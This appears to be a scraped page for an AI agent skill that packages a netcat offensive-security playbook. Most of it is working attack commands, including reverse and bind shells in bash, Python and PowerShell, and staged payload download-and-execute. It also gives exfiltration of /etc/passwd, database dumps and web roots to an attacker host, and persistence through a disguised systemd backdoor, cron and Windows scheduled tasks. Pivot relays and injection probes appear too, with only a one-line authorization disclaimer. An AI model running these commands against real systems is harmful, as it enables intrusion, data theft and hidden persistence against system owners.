npx claudepluginhub agentsecops/secopsagentkit --plugin offsec-skillsThis skill uses the workspace's default tool permissions.
Netcat (nc) is the "Swiss Army knife" of networking tools, providing simple Unix utility for reading and writing data across network connections. This skill covers authorized offensive security applications including reverse shells, bind shells, file transfers, port scanning, and banner grabbing.
Designs and optimizes AI agent action spaces, tool definitions, observation formats, error recovery, and context for higher task completion rates.
Compares coding agents like Claude Code and Aider on custom YAML-defined codebase tasks using git worktrees, measuring pass rate, cost, time, and consistency.
Designs, implements, and audits WCAG 2.2 AA accessible UIs for Web (ARIA/HTML5), iOS (SwiftUI traits), and Android (Compose semantics). Audits code for compliance gaps.
Netcat (nc) is the "Swiss Army knife" of networking tools, providing simple Unix utility for reading and writing data across network connections. This skill covers authorized offensive security applications including reverse shells, bind shells, file transfers, port scanning, and banner grabbing.
IMPORTANT: Netcat capabilities can be used maliciously. Only use these techniques in authorized penetration testing environments with proper written permission.
Basic connection and listening:
# Listen on port 4444
nc -lvnp 4444
# Connect to remote host
nc <target-ip> <port>
# Banner grab a service
echo "" | nc <target-ip> 80
# Simple port scan
nc -zv <target-ip> 1-1000
Progress: [ ] 1. Verify authorization for network testing [ ] 2. Test basic connectivity and port availability [ ] 3. Perform banner grabbing and service enumeration [ ] 4. Establish reverse or bind shells (if authorized) [ ] 5. Transfer files between systems [ ] 6. Create relay and pivot connections [ ] 7. Document findings and clean up connections [ ] 8. Remove any backdoors or persistence mechanisms
Work through each step systematically. Check off completed items.
CRITICAL: Before any netcat operations:
Test network connectivity and port availability:
# TCP connection test
nc -vz <target-ip> <port>
# UDP connection test
nc -uvz <target-ip> <port>
# Test port range
nc -zv <target-ip> 20-30
# Verbose output
nc -v <target-ip> <port>
Connection test results:
Extract service banner information:
# HTTP banner grab
echo -e "GET / HTTP/1.0\r\n\r\n" | nc <target-ip> 80
# SMTP banner grab
echo "QUIT" | nc <target-ip> 25
# FTP banner grab
echo "QUIT" | nc <target-ip> 21
# SSH banner grab
nc <target-ip> 22
# Generic banner grab with timeout
timeout 2 nc <target-ip> <port>
Service-specific banner grabbing:
# MySQL banner
nc <target-ip> 3306
# PostgreSQL banner
nc <target-ip> 5432
# SMB/CIFS banner
nc <target-ip> 445
# RDP banner
nc <target-ip> 3389
Simple port scanning (note: nmap is more comprehensive):
# Scan single port
nc -zv <target-ip> 80
# Scan port range
nc -zv <target-ip> 1-1000
# Scan specific ports
for port in 21 22 23 25 80 443 3389; do
nc -zv <target-ip> $port 2>&1 | grep succeeded
done
# Fast UDP scan
nc -uzv <target-ip> 53,161,500
Limitations of netcat port scanning:
Establish reverse shell connections from target to attacker:
Attacker machine (listener):
# Start listener
nc -lvnp 4444
# With verbose output
nc -lvnp 4444 -v
Target machine (connector):
# Linux reverse shell
nc <attacker-ip> 4444 -e /bin/bash
# If -e not available (OpenBSD netcat)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker-ip> 4444 > /tmp/f
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Bash reverse shell
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1
# Windows reverse shell (with ncat)
ncat.exe <attacker-ip> 4444 -e cmd.exe
# PowerShell reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-ip>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Upgrade reverse shell to interactive TTY:
# Python PTY upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background shell with Ctrl+Z, then:
stty raw -echo; fg
export TERM=xterm
export SHELL=/bin/bash
Create listening shell on target machine:
Target machine (listener with shell):
# Linux bind shell
nc -lvnp 4444 -e /bin/bash
# Without -e flag
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp 4444 > /tmp/f
# Windows bind shell
ncat.exe -lvnp 4444 -e cmd.exe
Attacker machine (connect to bind shell):
nc <target-ip> 4444
Bind shell vs Reverse shell:
Transfer files between systems:
Receiving file (listener):
# Receive file on port 5555
nc -lvnp 5555 > received_file.txt
Sending file (connector):
# Send file to listener
nc <receiver-ip> 5555 < file_to_send.txt
# With progress indication
pv file_to_send.txt | nc <receiver-ip> 5555
Directory/archive transfer:
# Sender: tar and compress directory, send via netcat
tar czf - /path/to/directory | nc <receiver-ip> 5555
# Receiver: receive and extract
nc -lvnp 5555 | tar xzf -
Large file transfer with verification:
# Sender: calculate checksum before sending
md5sum large_file.iso
cat large_file.iso | nc <receiver-ip> 5555
# Receiver: receive and verify
nc -lvnp 5555 > large_file.iso
md5sum large_file.iso
Use ncat with SSL for encrypted transfers:
# Receiver with SSL
ncat -lvnp 5555 --ssl > received_file.txt
# Sender with SSL
ncat <receiver-ip> 5555 --ssl < file_to_send.txt
# Generate self-signed certificate for ncat
openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key
ncat -lvnp 5555 --ssl --ssl-cert cert.pem --ssl-key cert.key
Create relay connections through compromised hosts:
# Simple relay: forward connections from port 8080 to internal host
mkfifo backpipe
nc -lvnp 8080 0<backpipe | nc <internal-target-ip> 80 1>backpipe
# Two-way relay
nc -lvnp 8080 -c "nc <internal-target-ip> 80"
# Use ncat for more reliable relay
ncat -lvnp 8080 --sh-exec "ncat <internal-target-ip> 80"
Pivot chain example:
# Compromised Host A (DMZ): relay to internal network
nc -lvnp 9090 -c "nc 192.168.1.100 3389"
# Attacker: connect through pivot
nc <compromised-host-a> 9090
Simple chat server for covert communication:
# Host 1 (listener)
nc -lvnp 6666
# Host 2 (connector)
nc <host1-ip> 6666
Two-way communication: Both parties can type and messages appear on both sides.
Document all netcat activities:
# Test for command injection vulnerability
echo -e "GET /?cmd=id HTTP/1.0\r\n\r\n" | nc <target-ip> 80
# SQL injection parameter testing
echo -e "GET /page?id=1' OR '1'='1 HTTP/1.0\r\n\r\n" | nc <target-ip> 80
# Test HTTP methods
echo -e "OPTIONS / HTTP/1.0\r\n\r\n" | nc <target-ip> 80
# Stage 1: Attacker listener
nc -lvnp 4444 > stage2_payload.sh
# Stage 2: Target downloads next stage
nc <attacker-ip> 4444 < /dev/null > /tmp/stage2.sh
chmod +x /tmp/stage2.sh
/tmp/stage2.sh
# Stage 3: Execute downloaded payload
# (payload establishes full reverse shell)
# Exfiltrate sensitive files
cat /etc/passwd | nc <attacker-ip> 5555
# Exfiltrate database dump
mysqldump -u root -p database_name | nc <attacker-ip> 5555
# Compress and exfiltrate directory
tar czf - /var/www/html | nc <attacker-ip> 5555
# Receiver
nc -lvnp 5555 > exfiltrated_data.tar.gz
# Create systemd service for persistence (Linux)
cat > /etc/systemd/system/netcat-backdoor.service <<EOF
[Unit]
Description=Network Connectivity Check
After=network.target
[Service]
Type=simple
ExecStart=/bin/nc <attacker-ip> 4444 -e /bin/bash
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
systemctl enable netcat-backdoor.service
systemctl start netcat-backdoor.service
# Cron-based persistence
(crontab -l; echo "@reboot /bin/nc <attacker-ip> 4444 -e /bin/bash") | crontab -
# Windows scheduled task
schtasks /create /tn "NetworkCheck" /tr "C:\ncat.exe <attacker-ip> 4444 -e cmd.exe" /sc onstart /ru System
Use netcat as post-exploitation utility:
# Metasploit session backgrounding and netcat shell
meterpreter > execute -f nc -a "<attacker-ip> 4444 -e /bin/bash"
# Upload netcat to target
meterpreter > upload /usr/bin/nc /tmp/nc
meterpreter > shell
sh-4.2$ /tmp/nc <attacker-ip> 5555 -e /bin/bash
#!/bin/bash
# automated_shell_catcher.sh - Automatic reverse shell handler
PORT=4444
LOG_DIR="shells/$(date +%Y%m%d)"
mkdir -p "$LOG_DIR"
while true; do
TIMESTAMP=$(date +%H%M%S)
echo "[*] Listening on port $PORT..."
nc -lvnp $PORT | tee "$LOG_DIR/shell_$TIMESTAMP.log"
echo "[*] Connection closed, restarting listener..."
sleep 2
done
Solutions:
# Install netcat (Ubuntu/Debian)
sudo apt-get install netcat-traditional
sudo apt-get install netcat-openbsd
# Install ncat (Nmap project, more features)
sudo apt-get install ncat
# Check available version
which nc ncat netcat
Solution: Use alternative technique with named pipes:
# Linux reverse shell without -e
rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker-ip> 4444 > /tmp/f
# Or use ncat which supports -e
ncat <attacker-ip> 4444 -e /bin/bash
Causes:
Solutions:
# Keep connection alive with while loop
while true; do nc <attacker-ip> 4444 -e /bin/bash; sleep 10; done
# Use ncat with keep-alive
ncat -lvnp 4444 --keep-open
# Add reconnection logic
while true; do nc <attacker-ip> 4444 -e /bin/bash 2>/dev/null; sleep 60; done
Solutions:
# Upgrade to PTY shell
python -c 'import pty; pty.spawn("/bin/bash")'
# Set terminal type
export TERM=xterm
# Enable raw mode (for Ctrl+C, etc.)
# On attacker machine, background shell with Ctrl+Z:
stty raw -echo; fg
Organizations can detect netcat activity by:
Enhance defensive posture: